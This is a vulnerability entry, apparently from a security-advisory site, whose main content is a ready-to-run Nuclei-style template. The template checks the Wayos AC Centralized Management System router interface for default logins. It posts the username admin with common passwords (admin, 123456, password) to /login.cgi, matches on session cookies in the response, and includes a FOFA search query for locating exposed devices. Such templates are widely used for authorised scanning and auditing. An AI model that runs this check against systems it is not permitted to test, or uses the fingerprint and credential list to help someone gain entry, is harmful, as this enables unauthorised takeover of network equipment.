漏洞描述
AC Centralized Management System default login credentials were discovered.
ac-default-login: AC Centralized Management System - Default password
PoC代码[已公开]
id: ac-default-login
info:
name: AC Centralized Management System - Default password
author: SleepingBag945
severity: high
description: |
AC Centralized Management System default login credentials were discovered.
reference:
- https://github.com/Ershu1/2021_Hvv/blob/main/Wayos%20AC%E9%9B%86%E4%B8%AD%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%BC%B1%E5%8F%A3%E4%BB%A4.md
- https://github.com/chaitin/xray/blob/master/pocs/secnet-ac-default-password.yml
metadata:
verified: "true"
max-request: 1
fofa-query: 'title="安网科技-智能路由系统"'
tags: ways-ac,default-login,vuln
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{ password }}&Submit=%E7%99%BB%E5%BD%95
attack: pitchfork
payloads:
username:
- admin
password:
- admin
- 123456
- 12345678
- password
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "ac_userid=admin"
- "ac_passwd="
condition: and
- type: word
part: body
words:
- "window.open"
- "text/javascript"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502200687b98d2c14cb4ee0bb91f2f6addc31ffd1962fd0e5c87392e837ae31d7448f0221009e9f70562d312a1dbf804ba39cf511ffd72a734befdf4aff193d07c2cfd0c9a2:922c64590222798bb761d5b6d8e72950